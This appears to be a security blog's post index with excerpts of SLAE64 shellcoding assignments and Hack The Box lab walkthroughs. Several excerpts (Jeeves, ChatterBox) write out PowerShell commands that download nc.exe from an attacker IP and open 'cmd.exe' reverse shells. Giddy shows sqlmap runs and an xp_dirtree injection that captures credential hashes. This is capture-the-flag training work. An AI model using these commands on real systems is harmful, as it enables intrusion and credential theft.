This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert (SLAE64) certification: https://www.pentesteracademy.com/course?id=7 Student-ID: PA-15847 The Objectives for the Assignment: – create a custom encoding scheme like the Insertion Encoder– PoC with execve stack as the shellcode to encode with your scheme and execute So we used the following python… Continue reading SLAE64: Assignment 4 – Custom Encoder
Author: admin
SLAE64: Assignment 3 – Egghunters
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert (SLAE64) certification: https://www.pentesteracademy.com/course?id=7 Student-ID: PA-15847 The Objectives for the Assignment: study about egg hunter shellcodecreate a working demo of the egghuntershould be configurable for different payloads An Egg Hunter is the first stage of a multistage payload. It consists of… Continue reading SLAE64: Assignment 3 – Egghunters
SLAE64: Assignment 2 – Reverse Shell
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert (SLAE64) certification: https://www.pentesteracademy.com/course?id=7 Student-ID: PA-15847 The Objectives for the Assignment: create a shell_reverse_tcp shellcode: reverse connects to configured IP and port needs a passcode if passcode is correct, then execs shell remove 0x00 from bind tcp shellcode So I took… Continue reading SLAE64: Assignment 2 – Reverse Shell
SLAE64: Assignment 1 – Bind Shell
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert (SLAE64) certification: https://www.pentesteracademy.com/course?id=7 Student-ID: PA-15847 The Objectives for the Assignment: create a shell_bind_tcp shellcode binds to a port needs a passcode if passcode is correct, then execs shell remove 0x00 from bind tcp shellcode So I took the code… Continue reading SLAE64: Assignment 1 – Bind Shell
HTB – Arctic Walkthrough
nmap Port 8500 – ColdFusion ColdFusion File Inclusion https://www.exploit-db.com/exploits/14641 Hash Crack JSP Shell Creation & File Upload & Shell Run the task and open the file on the following directory C:\ColdFusion8\wwwroot\CFIDE\shell.jsp Privilege escalation Python exploit suggester Upload ms10-059.exe (Chimchurri) via Powershell Get an admin shell with exe file .
HTB – NetMon Walkthrough
nmap Anonymous FTP PRTG Files are under C:\ProgramData\Paessler\PRTG Network Manager Looking for password The version of PRTG is vulnerable Use the following exploit: https://raw.githubusercontent.com/wildkindcc/CVE-2018-9276/master/CVE-2018-9276.py I got NT Authority\System
HTB – Tenten Walkthrough
nmap WPScan – enumerate users WPScan – Plugin Vulnerability (IDOR) found https://vagmour.eu/cve-2015-6668-cv-filename-disclosure-on-job-manager-wordpress-plugin/ As the PoC explained in the above URL, I tried to upload CV files first Since wp saves the uploaded files as /wp-content/uplaods/{year}/{month}/{file name} I checked if the I uploaded exist, and yes it’s uploaded Also in HTML code of application page, I… Continue reading HTB – Tenten Walkthrough
HTB – Jeeves Walkthrough
nmap gobuster Jenkins Code Execution Create a project on Jenkins Low Privileged Shell Enter commands under Build Section Powershell wget “http://10.10.14.4:8000/nc.exe” -outfile “nc.exe” Nc.exe 10.10.14.4 7777 -e cmd.exe And listened on python SimpleHTTPServer to send the nc.exe file and started to listen on port 7777 with nc for a reverse shell Meterpreter Shell Create a… Continue reading HTB – Jeeves Walkthrough
HTB – Giddy Walkthrough
nmap gobuster Search field – SQL error SQL InjectionYou can use the cheatsheet of PentestMonkeyhttp://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheetor you can use sqlmapsqlmap –url https://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=1 –dbms=mssql –dbs databases current usersqlmap –url https://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=1 –dbms=mssql –current-user Capture MSSQL credentials with xp_dirtree, smbserver.pyFollowing blogspost explains the process very goodhttps://medium.com/@markmotig/how-to-capture-mssql-credentials-with-xp-dirtree-smbserver-py-5c29d852f478=1; EXEC MASTER.sys.xp_dirtree ‘\\yourIP\something’ listen with responder to steal the user hashresponder -I tun0… Continue reading HTB – Giddy Walkthrough
HTB – ChatterBox Walkthrough
nmap Exploit Create a shell with msfvenom as described in the exploit Get the exploit from searchsploit or exploitdb Shell Privilege Escalation reg query “HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon” (New-Object System.Net.WebClient).DownloadFile(‘http://10.10.14.16:8000/nc.exe’,’C:\Users\Alfred\Desktop\nc.exe’)$username = ‘administrator’$password = ‘Welcome1!’$securePassword = ConvertTo-SecureString $password -AsPlainText -Force$credential = New-Object System.Management.Automation.PSCredential $username, $securePasswordStart-Process C:\Users\Alfred\Desktop\nc.exe -ArgumentList ‘-e cmd.exe 10.10.14.16 1234’ -Credential $credential And we get an admin… Continue reading HTB – ChatterBox Walkthrough
